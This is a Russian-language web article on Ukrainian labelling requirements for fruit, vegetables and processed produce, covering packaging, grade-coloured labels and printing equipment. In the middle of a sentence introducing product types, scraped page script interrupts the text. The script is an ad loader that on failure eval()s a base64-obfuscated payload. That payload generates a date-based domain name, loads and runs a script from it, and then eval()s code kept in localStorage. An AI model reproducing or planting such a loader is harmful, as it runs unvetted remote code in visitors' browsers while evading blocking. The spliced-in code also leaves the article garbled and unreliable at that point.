Особенности маркировки фруктов и овощей

Относясь к группе продовольственной продукции, любые овощи, фрукты, а также изготовленные на их основе товары (например, джемы) требуют обязательной маркировки, что регламентируется соответствующим законодательством. Это касается не только производимых в Украине, но и ввозимых на таможенную территорию страны изделий.

Маркировка овощей и фруктов представляет собой совокупность текстовой, цифровой и графической информации, позволяющей реализовать ряд задач, в том числе:

предоставить важные сведения конечным потребителям продукции (о сроке годности, особенностях выращивания и прочих качествах);обеспечить быстрый и комфортный складской, а также логистический учет товарных партий;создать условия для контроля качества продуктов питания соответствующими уполномоченными органами.

Маркировка фруктов и овощей может подразумевать размещение различных сведений непосредственно на упаковках. Это такие данные, как:

производитель товара, его адрес;срок годности;оптимальные условия хранения;пищевая ценность и т. д.

Вся эта информация наносится не только на упаковку продуктов, например, посредством этикеток для картонных ящиков, но и на более габаритную тару, предназначенную для транспортировки и длительного хранения фруктов и овощей. Данные правила касаются и ввозимых на территорию страны товаров.

Особенности маркировки и упаковки

Продукты питания данной группы представлены на рынке в широком ассортименте наименований, в том числе: var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

готовые к употреблению плоды;соленья и ферментированные изделия;консервы;вяленые и сушеные товары.

Подлежащие реализации в своем естественном виде фрукты и овощи должны быть упакованными в ящики или контейнеры, способными защитить плоды от влияния высокого уровня влажности. Маркировка в таком случае выполняется посредством этикеток. Причем они должны иметь окантовку определенного цвета, соответствующего сорту продукции (от голубого оттенка для высшей категории товаров до зеленого для третьей категории). Такие этикетки в обязательном порядке содержат данные об изготовителе, дате упаковки и сроке хранения.

Подверженные ферментации (например, квашеные) овощи и фрукты упаковываются в герметичные емкости объемом не более 120 кубических дециметров, а консервированные плоды – в лакированные стальные и стеклянные банки. Маркировка продовольственных товаров этой категории обязательно содержит данные об их массе и составе, в том числе об использованных в процессе готовки специях.

Что касается сушеных продуктов питания, то они подлежат упаковке в тару, которая изготовляется из не подверженных окислительным процессам материалов. Как правило, это бумажные или тканевые мешки. Маркировка таких изделий требует указания вида и сорта плодов, из которых они были изготовлены. Кроме того, на этикетке обязательно должна содержаться надпись: «Хранить в прохладном сухом месте». Это связано с тем, что данная продукция быстро теряет свой товарный вид и пищевые качества при несоблюдении такой нормы.

Если говорить об оборудовании, которое используется для маркировки фруктов и овощей, то его выбор зависит от особенностей упаковочных изделий. Это могут быть лазерные принтеры и струйные установки, термотрансферные и другие машины. Первые наиболее оптимальны для печати этикеток, вторые подходят для нанесения информации непосредственно на пластиковую и деревянную тару, а третьи отличаются универсальными эксплуатационными качествами. (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/osobennosti-markirovki-fruktov-i-ovoshhej/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top